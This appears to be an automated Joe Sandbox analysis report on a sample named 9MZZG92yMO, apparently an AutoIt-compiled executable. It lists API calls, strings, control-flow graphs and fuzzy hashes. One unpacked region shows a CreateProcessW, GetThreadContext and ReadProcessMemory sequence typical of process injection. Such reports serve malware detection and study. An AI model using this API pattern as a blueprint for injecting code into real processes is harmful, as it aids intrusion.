                                                                                                                      • Instruction ID: 84f15dd4a1be7057decb65d0c87056a4218093c231d69a85bba13be8d8beed01
                                                                                                                      • Opcode Fuzzy Hash: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                                                                                                                      • Instruction Fuzzy Hash: 8CA12974E04209EBDB19CFA4C894BEEBBB5BF48304F208159E205BB2C1D7B59A41CF65

                                                                                                                      Control-flow Graph

                                                                                                                      control_flow_graph 1114 4c39d5-4c3a45 CreateWindowExW * 2 ShowWindow * 2
                                                                                                                      APIs
                                                                                                                      • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 004C3A03
                                                                                                                      • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 004C3A24
                                                                                                                      • ShowWindow.USER32(00000000,?,?), ref: 004C3A38
                                                                                                                      • ShowWindow.USER32(00000000,?,?), ref: 004C3A41
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$CreateShow
                                                                                                                      • String ID: AutoIt v3$edit
                                                                                                                      • API String ID: 1584632944-3779509399
                                                                                                                      • Opcode ID: 2cf9ecf1925b5b87f68d5d17e0e00b9a0862be442f7600541bdaa674436926fb
                                                                                                                      • Instruction ID: 5d2891618285b6acad127223cd57644408edeceaa17ecb8d491b8ce53e013e8e
                                                                                                                      • Opcode Fuzzy Hash: 2cf9ecf1925b5b87f68d5d17e0e00b9a0862be442f7600541bdaa674436926fb
                                                                                                                      • Instruction Fuzzy Hash: D0F03A786402907EEA3157276C08E6B3E7DE7D7F54B00102ABD01B2170DA650804EBB0

                                                                                                                      Control-flow Graph

                                                                                                                      control_flow_graph 1467 1108220-1108356 call 1105e70 call 1108110 CreateFileW 1474 1108358 1467->1474 1475 110835d-110836d 1467->1475 1476 110840d-1108412 1474->1476 1478 1108374-110838e VirtualAlloc 1475->1478 1479 110836f 1475->1479 1480 1108390 1478->1480 1481 1108392-11083a9 ReadFile 1478->1481 1479->1476 1480->1476 1482 11083ab 1481->1482 1483 11083ad-11083e7 call 1108150 call 1107110 1481->1483 1482->1476 1488 1108403-110840b ExitProcess 1483->1488 1489 11083e9-11083fe call 11081a0 1483->1489 1488->1476 1489->1488
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 01108110: Sleep.KERNELBASE(000001F4), ref: 01108121
                                                                                                                      • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0110834C
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2176622884.0000000001105000.00000040.00000020.00020000.00000000.sdmp, Offset: 01105000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_1105000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateFileSleep
                                                                                                                      • String ID: HNB7G8A8XIJ9UUOJMAL0Q
                                                                                                                      • API String ID: 2694422964-1569751964
                                                                                                                      • Opcode ID: 7ed7585d8a602350a693a7882da7bf79b44b7b298ab16455a8ba58e1ce68258f
                                                                                                                      • Instruction ID: 0087035c0a26c7b0cb71292cc0db1ba0496ce75c00b3f8627167cf0324ba7e79
                                                                                                                      • Opcode Fuzzy Hash: 7ed7585d8a602350a693a7882da7bf79b44b7b298ab16455a8ba58e1ce68258f
                                                                                                                      • Instruction Fuzzy Hash: 8D51B630D04248DAEF16DBF4D854BEEBB75AF19304F044198E248BB2C1C7B91B49CBA6

                                                                                                                      Control-flow Graph

                                                                                                                      control_flow_graph 1491 4c407c-4c4092 1492 4c416f-4c4173 1491->1492 1493 4c4098-4c40ad call 4c7a16 1491->1493 1496 4fd3c8-4fd3d7 LoadStringW 1493->1496 1497 4c40b3-4c40d3 call 4c7bcc 1493->1497 1500 4fd3e2-4fd3fa call 4c7b2e call 4c6fe3 1496->1500 1497->1500 1501 4c40d9-4c40dd 1497->1501 1510 4c40ed-4c416a call 4e2de0 call 4c454e call 4e2dbc Shell_NotifyIconW call 4c5904 1500->1510 1513 4fd400-4fd41e call 4c7cab call 4c6fe3 call 4c7cab 1500->1513 1503 4c4174-4c417d call 4c8047 1501->1503 1504 4c40e3-4c40e8 call 4c7b2e 1501->1504 1503->1510 1504->1510 1510->1492 1513->1510
APIs
• LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 004FD3D7
  • Part of subcall function 004C7BCC: _memmove.LIBCMT ref: 004C7C06
• _memset.LIBCMT ref: 004C40FC
• _wcscpy.LIBCMT ref: 004C4150
• Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 004C4160
Memory Dump Source
• Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
Similarity
• API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
• String ID: Line:
• API String ID: 3942752672-1585850449
APIs
  • Part of subcall function 004C4DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,005852F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 004C4E0F
• _free.LIBCMT ref: 004FE263
• _free.LIBCMT ref: 004FE2AA
  • Part of subcall function 004C6A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 004C6BAD
Similarity
• API ID: _free$CurrentDirectoryLibraryLoad
• String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
• API String ID: 2861923089-1757145024
APIs
• RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,004C35A1,SwapMouseButtons,00000004,?), ref: 004C35D4
• RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,004C35A1,SwapMouseButtons,00000004,?,?,?,?,004C2754), ref: 004C35F5
• RegCloseKey.KERNELBASE(00000000,?,?,004C35A1,SwapMouseButtons,00000004,?,?,?,?,004C2754), ref: 004C3617
Similarity
• API ID: CloseOpenQueryValue
• String ID: Control Panel\Mouse
• API String ID: 3677997916-824357125
APIs
• CreateProcessW.KERNELBASE(?,00000000), ref: 011078CB
• Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01107961
• ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01107983
Memory Dump Source
• Source File: 00000000.00000002.2176622884.0000000001105000.00000040.00000020.00020000.00000000.sdmp, Offset: 01105000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1105000_9MZZG92yMO.jbxd
Similarity
• API ID: Process$ContextCreateMemoryReadThreadWow64
• String ID:
• API String ID: 2438371351-0
APIs
  • Part of subcall function 004C4EE5: _fseek.LIBCMT ref: 004C4EFD
  • Part of subcall function 00529734: _wcscmp.LIBCMT ref: 00529824
  • Part of subcall function 00529734: _wcscmp.LIBCMT ref: 00529837
• _free.LIBCMT ref: 005296A2
• _free.LIBCMT ref: 005296A9
• _free.LIBCMT ref: 00529714
  • Part of subcall function 004E2D55: RtlFreeHeap.NTDLL(00000000,00000000,?,004E9A24), ref: 004E2D69
  • Part of subcall function 004E2D55: GetLastError.KERNEL32(00000000,?,004E9A24), ref: 004E2D7B
• _free.LIBCMT ref: 0052971C
Similarity
• API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
• String ID:
• API String ID: 1552873950-0
APIs
Similarity
• API ID: __flsbuf__flush__getptd_noexit__write_memmove
• String ID:
• API String ID: 2782032738-0
APIs
• _memset.LIBCMT ref: 004C44CF
  • Part of subcall function 004C407C: _memset.LIBCMT ref: 004C40FC
  • Part of subcall function 004C407C: _wcscpy.LIBCMT ref: 004C4150
  • Part of subcall function 004C407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 004C4160
• KillTimer.USER32(?,00000001,?,?), ref: 004C4524
• SetTimer.USER32(?,00000001,000002EE,00000000), ref: 004C4533
• Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 004FD4B9
Similarity
• API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
• String ID:
• API String ID: 1378193009-0
APIs
Similarity
• API ID: _memmove
• String ID: AU3!P/U$EA06
• API String ID: 4104443479-101426668
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 004FEA39
                                                                                                                      • GetOpenFileNameW.COMDLG32(?), ref: 004FEA83
                                                                                                                        • Part of subcall function 004C4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,004C4743,?,?,004C37AE,?), ref: 004C4770
                                                                                                                        • Part of subcall function 004E0791: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 004E07B0
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Name$Path$FileFullLongOpen_memset
                                                                                                                      • String ID: X
                                                                                                                      • API String ID: 3777226403-3081909835
                                                                                                                      • Opcode ID: 865328346820c33d09fe027a9c10051ca9757c29b79bab232fdfd19c894e128e
                                                                                                                      • Instruction ID: 139dc3b366c5b6ee1668a91d98a261e06e5c2f866046e097f10ffe7b03914d57
                                                                                                                      • Opcode Fuzzy Hash: 865328346820c33d09fe027a9c10051ca9757c29b79bab232fdfd19c894e128e
                                                                                                                      • Instruction Fuzzy Hash: E221C674A002489BCB419F95DC49BEE7BF8AF49319F00805EE508B7241DFF85989DFA5
                                                                                                                      APIs
                                                                                                                      • GetTempPathW.KERNEL32(00000104,?), ref: 005298F8
                                                                                                                      • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 0052990F
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Temp$FileNamePath
                                                                                                                      • String ID: aut
                                                                                                                      • API String ID: 3285503233-3010740371
                                                                                                                      • Opcode ID: 1838f867500d3f756c44be9ea9f6164eb2f79aae258a32637dfd9b46365f1641
                                                                                                                      • Instruction ID: a171e6c6ba69427557f003d97b57de85bcf6b1f549435cf5b23c54d2f51b8707
                                                                                                                      • Opcode Fuzzy Hash: 1838f867500d3f756c44be9ea9f6164eb2f79aae258a32637dfd9b46365f1641
                                                                                                                      • Instruction Fuzzy Hash: FCD05E7D58430DABDB509BA4EC0EFEA7B3CE714704F0046B1BA54910A1EAB09598AB91
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 1e6b2ec7839f0ea0abaef410663ed5661fe76669bd8811d2459c05bec068b28d
                                                                                                                      • Instruction ID: d7d49f78f55269d65fa288cf13b7dc4f616ceea8bac948989a296c5284f4f869
                                                                                                                      • Opcode Fuzzy Hash: 1e6b2ec7839f0ea0abaef410663ed5661fe76669bd8811d2459c05bec068b28d
                                                                                                                      • Instruction Fuzzy Hash: B6F15675A083419FCB14DF29C484A6ABBE5FF88318F14892EF8999B351D734E945CF82
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 004C4370
                                                                                                                      • Shell_NotifyIconW.SHELL32(00000000,?), ref: 004C4415
                                                                                                                      • Shell_NotifyIconW.SHELL32(00000001,?), ref: 004C4432
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: IconNotifyShell_$_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1505330794-0
                                                                                                                      • Opcode ID: a5afe149f5cb4efe50620f9c8986a1d839511eb0ce0e184383eeb05cb5c886b8
                                                                                                                      • Instruction ID: 6c5f9e09722e496ce5c03d28bc184c911f47de59a143dc3fadc211f5fe89dc3c
                                                                                                                      • Opcode Fuzzy Hash: a5afe149f5cb4efe50620f9c8986a1d839511eb0ce0e184383eeb05cb5c886b8
                                                                                                                      • Instruction Fuzzy Hash: 7231E5745047018FC760DF24D984B9BBBF8FB98308F00092FE99A92351E7756948CB56
                                                                                                                      APIs
                                                                                                                      • __FF_MSGBANNER.LIBCMT ref: 004E5733
                                                                                                                        • Part of subcall function 004EA16B: __NMSG_WRITE.LIBCMT ref: 004EA192
                                                                                                                        • Part of subcall function 004EA16B: __NMSG_WRITE.LIBCMT ref: 004EA19C
                                                                                                                      • __NMSG_WRITE.LIBCMT ref: 004E573A
                                                                                                                        • Part of subcall function 004EA1C8: GetModuleFileNameW.KERNEL32(00000000,005833BA,00000104,?,00000001,00000000), ref: 004EA25A
                                                                                                                        • Part of subcall function 004EA1C8: ___crtMessageBoxW.LIBCMT ref: 004EA308
                                                                                                                        • Part of subcall function 004E309F: ___crtCorExitProcess.LIBCMT ref: 004E30A5
                                                                                                                        • Part of subcall function 004E309F: ExitProcess.KERNEL32 ref: 004E30AE
                                                                                                                        • Part of subcall function 004E8B28: __getptd_noexit.LIBCMT ref: 004E8B28
                                                                                                                      • RtlAllocateHeap.NTDLL(01070000,00000000,00000001,00000000,?,?,?,004E0DD3,?), ref: 004E575F
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1372826849-0
                                                                                                                      • Opcode ID: 1eb402016f97ab9e363046b9a500e3d8297a8e422949502b65a7abbc0fe9cc4c
                                                                                                                      • Instruction ID: ef35e0e250b9844cdb0443c893120d1015fa89810cd9b23a1a1c60ca4d11e3e4
                                                                                                                      • Opcode Fuzzy Hash: 1eb402016f97ab9e363046b9a500e3d8297a8e422949502b65a7abbc0fe9cc4c
                                                                                                                      • Instruction Fuzzy Hash: A901F935200B91DED6112B77EC42A2E77488F9276FF11042FF805A7281DE7C9C11976D
                                                                                                                      APIs
                                                                                                                      • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00529548,?,?,?,?,?,00000004), ref: 005298BB
                                                                                                                      • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00529548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 005298D1
                                                                                                                      • CloseHandle.KERNEL32(00000000,?,00529548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 005298D8
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: File$CloseCreateHandleTime
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3397143404-0
                                                                                                                      • Opcode ID: 47b4cea87f0c1fedc2208a124ba388f014009e56db46fd6e09479a258f2deaac
                                                                                                                      • Instruction ID: 7ae979cceaa515749f06db756de94afed335c2d8a69d67483ee5361f63cf1d4d
                                                                                                                      • Opcode Fuzzy Hash: 47b4cea87f0c1fedc2208a124ba388f014009e56db46fd6e09479a258f2deaac
                                                                                                                      • Instruction Fuzzy Hash: CDE08636140224B7D7211F68EC09FCA7F59AB17B65F144120FB14690E087B12515A798
                                                                                                                      APIs
                                                                                                                      • _free.LIBCMT ref: 00528D1B
                                                                                                                        • Part of subcall function 004E2D55: RtlFreeHeap.NTDLL(00000000,00000000,?,004E9A24), ref: 004E2D69
                                                                                                                        • Part of subcall function 004E2D55: GetLastError.KERNEL32(00000000,?,004E9A24), ref: 004E2D7B
                                                                                                                      • _free.LIBCMT ref: 00528D2C
                                                                                                                      • _free.LIBCMT ref: 00528D3E
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 776569668-0
                                                                                                                      • Opcode ID: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                                                                                                      • Instruction ID: ed5c738872973a29923d8f93796e179b73a3c452601aeae5747d2bb29b69d122
                                                                                                                      • Opcode Fuzzy Hash: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                                                                                                      • Instruction Fuzzy Hash: F7E0C2A1A0265282CB24A5BABE40FA313DC5F48357704080EB50DD71C6CEA8F8428028
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
Similarity
• API ID:
• String ID: CALL
• API String ID: 0-4196123274
• Opcode ID: fd06b43037fc67edc5e850b0b6baea3deadeabe914033a803696f3a26e94db75
• Instruction ID: 624c226bbe3f4249722538fb959e5768844ecf34f7b905885bedf7592e0cd489
• Opcode Fuzzy Hash: fd06b43037fc67edc5e850b0b6baea3deadeabe914033a803696f3a26e94db75
• Instruction Fuzzy Hash: B5226978508205DFD764DF14C495F2ABBE1BF84308F14896EE88A8B361D739EC45CB8A

APIs
Memory Dump Source
• Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
Similarity
• API ID: _memmove
• String ID:
• API String ID: 4104443479-0
• Opcode ID: 75b3ef76dc9c1d7680ff1126038a0b5bca49f3ec50bdc15de679bd26e1e87542
• Instruction ID: 5edda051124dc71c0cedc3e8f5f45716be4710d0d82c709adab0baef84c7a2f6
• Opcode Fuzzy Hash: 75b3ef76dc9c1d7680ff1126038a0b5bca49f3ec50bdc15de679bd26e1e87542
• Instruction Fuzzy Hash: 4D31E7B5600606AFC744CF69C8D1E69B3A4FF48314714822EE519CB391EB75ED50CF94

APIs
• IsThemeActive.UXTHEME ref: 004C4834
  • Part of subcall function 004E336C: __lock.LIBCMT ref: 004E3372
  • Part of subcall function 004E336C: DecodePointer.KERNEL32(00000001,?,004C4849,00517C74), ref: 004E337E
  • Part of subcall function 004E336C: EncodePointer.KERNEL32(?,?,004C4849,00517C74), ref: 004E3389
  • Part of subcall function 004C48FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 004C4915
  • Part of subcall function 004C48FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 004C492A
  • Part of subcall function 004C3B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 004C3B68
  • Part of subcall function 004C3B3A: IsDebuggerPresent.KERNEL32 ref: 004C3B7A
  • Part of subcall function 004C3B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,005852F8,005852E0,?,?), ref: 004C3BEB
  • Part of subcall function 004C3B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 004C3C6F
• SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 004C4874
Memory Dump Source
• Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
Similarity
• API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
• String ID:
• API String ID: 1438897964-0
• Opcode ID: 947e1c6b9f73b1e71b83d5a24a39e0cc750fc5b5e0b0d8d4744b9f1b0294c4cc
• Instruction ID: efc5f0c303a2f58dd813d812b1ceb3cd571fe32ba37e34520ffa6504b296a5ba
• Opcode Fuzzy Hash: 947e1c6b9f73b1e71b83d5a24a39e0cc750fc5b5e0b0d8d4744b9f1b0294c4cc
• Instruction Fuzzy Hash: 7611AE758043419BD700EF2AD845A0EBFE8EBA5754F00451FF841A3271DB749948DB96

APIs
  • Part of subcall function 004E571C: __FF_MSGBANNER.LIBCMT ref: 004E5733
  • Part of subcall function 004E571C: __NMSG_WRITE.LIBCMT ref: 004E573A
  • Part of subcall function 004E571C: RtlAllocateHeap.NTDLL(01070000,00000000,00000001,00000000,?,?,?,004E0DD3,?), ref: 004E575F
• std::exception::exception.LIBCMT ref: 004E0DEC
• __CxxThrowException@8.LIBCMT ref: 004E0E01
  • Part of subcall function 004E859B: RaiseException.KERNEL32(?,?,?,00579E78,00000000,?,?,?,?,004E0E06,?,00579E78,?,00000001), ref: 004E85F0
Memory Dump Source
• Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
